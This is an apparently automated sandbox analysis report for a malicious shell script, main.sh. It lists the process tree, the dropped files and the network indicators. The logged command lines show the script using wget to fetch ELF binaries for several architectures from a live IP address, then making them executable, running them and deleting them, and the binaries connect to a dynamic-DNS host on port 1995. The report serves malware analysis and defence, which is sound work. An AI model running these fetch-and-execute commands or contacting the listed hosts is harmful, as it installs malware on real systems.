File name:

main.sh

Full analysis: https://app.any.run/tasks/c2f72dad-bb89-4409-9557-12cf81ae0578
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:34:22
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

041FD7CD861D6AD38485C1E783EC10B3

SHA1:

2BE77942D3CB68D4B2116D5E29AD4AE446019F98

SHA256:

EE58E06CE6F1DF21CE9A75D8601F0027F32585340978ED1E4DCE1C4746ECC468

SSDEEP:

12:EkJJMcdkqyEkJJMcdT1qy/akJJMcCqzkJJMca6qoahkJJMcYqx:7JJbREJJbimhJJbVgJJb8TuJJbbx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • main_x86 (deleted) (PID: 41401)
      • main_x86 (PID: 41400)
      • main_x86 (deleted) (PID: 41403)
      • main_x86_64 (PID: 41409)
      • main_x86_64 (deleted) (PID: 41410)
      • main_x86_64 (deleted) (PID: 41412)

  • SUSPICIOUS

    • Starts itself from another location

      • main_x86 (PID: 41400)
      • main_x86_64 (PID: 41409)

    • Modifies file or directory owner

      • sudo (PID: 41392)

    • Executes commands using command-line interpreter

      • sudo (PID: 41395)
      • bash (PID: 41396)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41396)

    • Uses wget to download content

      • bash (PID: 41396)

    • Potential Corporate Privacy Violation

      • wget (PID: 41398)
      • wget (PID: 41407)
      • wget (PID: 41427)
      • wget (PID: 41435)
      • wget (PID: 41414)

    • Connects to unusual port

      • main_x86_64 (deleted) (PID: 41410)
      • main_x86 (deleted) (PID: 41401)

  • INFO

    • Checks timezone

      • wget (PID: 41398)
      • wget (PID: 41407)
      • wget (PID: 41414)
      • wget (PID: 41427)
      • wget (PID: 41435)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
168
Monitored processes
36
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs main_x86 no specs rm no specs main_x86 (deleted) bash no specs wget main_x86 (deleted) no specs chmod no specs main_x86_64 no specs rm no specs bash no specs main_x86_64 (deleted) main_x86_64 (deleted) no specs wget tracker-extract-3 no specs chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
41391/bin/sh -c "sudo chown user /tmp/main\.sh && chmod +x /tmp/main\.sh && DISPLAY=:0 sudo -iu user /tmp/main\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41392sudo chown user /tmp/main.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41393chown user /tmp/main.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41394chmod +x /tmp/main.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41395sudo -iu user /tmp/main.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41396-bash --login -c \/tmp\/main\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41397/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41398wget http://41.216.188.159/main_x86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41399chmod 777 Desktop Documents Downloads main_x86 Music Pictures Public snap Templates test_files Videos/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41400./main_x86/home/user/main_x86bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
4
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
41398wget/home/user/main_x86 (deleted)o
MD5:
SHA256:
41407wget/home/user/main_x86_64 (deleted)o
MD5:
SHA256:
41414wget/home/user/main_armbinary
MD5:
SHA256:
41427wget/home/user/main_arm7binary
MD5:
SHA256:
41435wget/home/user/main_m68ko
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
246
DNS requests
242
Threats
239

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41398
wget
GET
200
41.216.188.159:80
http://41.216.188.159/main_x86
unknown
unknown
41407
wget
GET
200
41.216.188.159:80
http://41.216.188.159/main_x86_64
unknown
unknown
41414
wget
GET
200
41.216.188.159:80
http://41.216.188.159/main_arm
unknown
unknown
41427
wget
GET
200
41.216.188.159:80
http://41.216.188.159/main_arm7
unknown
unknown
41435
wget
GET
200
41.216.188.159:80
http://41.216.188.159/main_m68k
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
1178
snap-store
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41398
wget
41.216.188.159:80
vagner.sytes.net
Private-Hosting di Cipriano oscar
DE
suspicious
41401
main_x86 (deleted)
41.216.188.159:1995
vagner.sytes.net
Private-Hosting di Cipriano oscar
DE
suspicious

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::197
  • 185.125.190.96
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.49
  • 91.189.91.49
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.97
whitelisted
google.com
  • 142.250.184.206
  • 2a00:1450:4001:81d::200e
whitelisted
odrs.gnome.org
  • 212.102.56.179
  • 169.150.255.184
  • 195.181.175.41
  • 195.181.170.19
  • 169.150.255.181
  • 207.211.211.27
  • 37.19.194.81
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::344
whitelisted
vagner.sytes.net
  • 41.216.188.159
unknown
14.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41401
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41398
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41410
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41407
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41401
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41414
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41410
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41427
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41401
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41410
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
main.sh